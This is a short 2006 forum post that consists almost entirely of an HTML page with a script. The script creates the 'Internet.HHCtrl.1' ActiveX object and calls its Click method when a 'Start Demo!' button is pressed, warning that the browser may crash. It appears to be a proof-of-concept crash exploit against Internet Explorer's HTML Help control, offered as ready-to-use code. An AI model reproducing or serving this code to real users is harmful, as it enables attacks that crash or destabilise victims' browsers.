axxl2006 Posted July 23, 2006 Report Posted July 23, 2006 <html><body><script>function Demo() { var a = new ActiveXObject("Internet.HHCtrl.1"); a.Click();}</script>Clicking the button below may crash your browser!<input type='button' onClick='Demo()' value='Start Demo!'></body></html> Quote